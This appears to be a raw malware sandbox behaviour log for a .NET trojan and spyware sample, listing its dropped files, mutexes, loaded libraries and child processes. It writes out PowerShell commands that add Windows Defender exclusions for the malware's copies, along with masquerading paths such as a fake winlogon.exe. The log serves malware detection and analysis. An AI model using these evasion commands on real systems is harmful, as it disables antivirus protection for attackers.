                            Source: conhost.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: 4si9noTBNw.exe, qHDvmF0J95Squ092xQv.csCryptographic APIs: 'CreateDecryptor'
                            Source: 4si9noTBNw.exe, qHDvmF0J95Squ092xQv.csCryptographic APIs: 'CreateDecryptor'
                            Source: 4si9noTBNw.exe, qHDvmF0J95Squ092xQv.csCryptographic APIs: 'CreateDecryptor'
                            Source: 4si9noTBNw.exe, qHDvmF0J95Squ092xQv.csCryptographic APIs: 'CreateDecryptor'
                            Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winEXE@48/77@1/2
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile created: C:\Program Files\Windows Defender\en-GB\conhost.exeJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile created: C:\Users\user\Desktop\nocldQFM.logJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeMutant created: NULL
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7752:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8496:120:WilError_03
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-6D1Q3I5bf77yvwQ4WtMP
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5904:120:WilError_03
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile created: C:\Users\user\AppData\Local\Temp\2gwm2xp5Jump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\csCDqY6YZN.bat"
                            Source: 4si9noTBNw.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: 4si9noTBNw.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile read: C:\Users\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: c0j9PivMNz.54.dr, UOoF5jPXKL.54.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                            Source: 4si9noTBNw.exeReversingLabs: Detection: 68%
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile read: C:\Users\user\Desktop\4si9noTBNw.exeJump to behavior
                            Source: unknownProcess created: C:\Users\user\Desktop\4si9noTBNw.exe "C:\Users\user\Desktop\4si9noTBNw.exe"
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2gwm2xp5\2gwm2xp5.cmdline"
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: unknownProcess created: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exe "C:\Program Files (x86)\java\VTixufCejPQZEvXiB.exe"
                            Source: unknownProcess created: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exe "C:\Program Files (x86)\java\VTixufCejPQZEvXiB.exe"
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES39B.tmp" "c:\Windows\System32\CSC5AB1265740184DDC93ABA6EF26458DB.TMP"
                            Source: unknownProcess created: C:\Users\Public\AccountPictures\winlogon.exe C:\Users\Public\AccountPictures\winlogon.exe
                            Source: unknownProcess created: C:\Users\Public\AccountPictures\winlogon.exe C:\Users\Public\AccountPictures\winlogon.exe
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\java\VTixufCejPQZEvXiB.exe'
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\VTixufCejPQZEvXiB.exe'
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\VTixufCejPQZEvXiB.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\AccountPictures\winlogon.exe'
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Defender\en-GB\conhost.exe'
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\4si9noTBNw.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\csCDqY6YZN.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: unknownProcess created: C:\Users\user\Desktop\4si9noTBNw.exe C:\Users\user\Desktop\4si9noTBNw.exe
                            Source: unknownProcess created: C:\Users\user\Desktop\4si9noTBNw.exe C:\Users\user\Desktop\4si9noTBNw.exe
                            Source: unknownProcess created: C:\Program Files\Windows Defender\en-GB\conhost.exe "C:\Program Files\Windows Defender\en-GB\conhost.exe"
                            Source: unknownProcess created: C:\Program Files\Windows Defender\en-GB\conhost.exe "C:\Program Files\Windows Defender\en-GB\conhost.exe"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                            Source: unknownProcess created: C:\Recovery\VTixufCejPQZEvXiB.exe "C:\Recovery\VTixufCejPQZEvXiB.exe"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\en-GB\conhost.exe "C:\Program Files\Windows Defender\en-GB\conhost.exe"
                            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: unknownProcess created: C:\Users\Public\AccountPictures\winlogon.exe "C:\Users\Public\AccountPictures\winlogon.exe"
                            Source: unknownProcess created: C:\Program Files\Windows Defender\en-GB\conhost.exe "C:\Program Files\Windows Defender\en-GB\conhost.exe"
                            Source: unknownProcess created: C:\Users\user\Desktop\4si9noTBNw.exe "C:\Users\user\Desktop\4si9noTBNw.exe"
                            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2gwm2xp5\2gwm2xp5.cmdline"Jump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\java\VTixufCejPQZEvXiB.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\VTixufCejPQZEvXiB.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\VTixufCejPQZEvXiB.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\AccountPictures\winlogon.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Defender\en-GB\conhost.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\4si9noTBNw.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\csCDqY6YZN.bat" Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES39B.tmp" "c:\Windows\System32\CSC5AB1265740184DDC93ABA6EF26458DB.TMP"Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\en-GB\conhost.exe "C:\Program Files\Windows Defender\en-GB\conhost.exe"
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: ktmw32.dllJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: dlnashext.dllJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: wpdshext.dllJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeSection loaded: version.dllJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeSection loaded: version.dllJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
